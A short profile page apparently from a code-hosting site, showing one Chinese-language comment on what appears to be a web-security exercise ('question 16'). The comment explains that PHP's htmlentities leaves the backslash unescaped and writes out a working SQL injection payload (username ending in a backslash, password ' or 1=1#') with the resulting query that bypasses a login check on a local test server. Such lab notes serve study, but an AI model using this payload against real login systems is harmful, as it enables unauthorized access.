Cool Cat

icon location Beijing icon location 公众号《实用养猪指南》

Results 1 comments of Cool Cat

第16题 有人试成功了吗?

htmlentities($str, ENT_QUOTES);//将字符转换为 HTML 转义字符,既转换双引号也转换单引号 那么来看看HTML转义字符的范围吧,https://www.w3school.com.cn/html/html_entities.asp,发现转义符号 \ 不在射程范围 思路,尝试试利用sql语句中的单引号构造这样的格式 where name='xx\’x' or 1=1 进行绕过 请求构造如下:http://127.0.0.1/16.php?username=admin\&password=%20or%201=1%23 对应的SQL为: SELECT * FROM users WHERE name='admin\' AND pass=' or 1=1#‘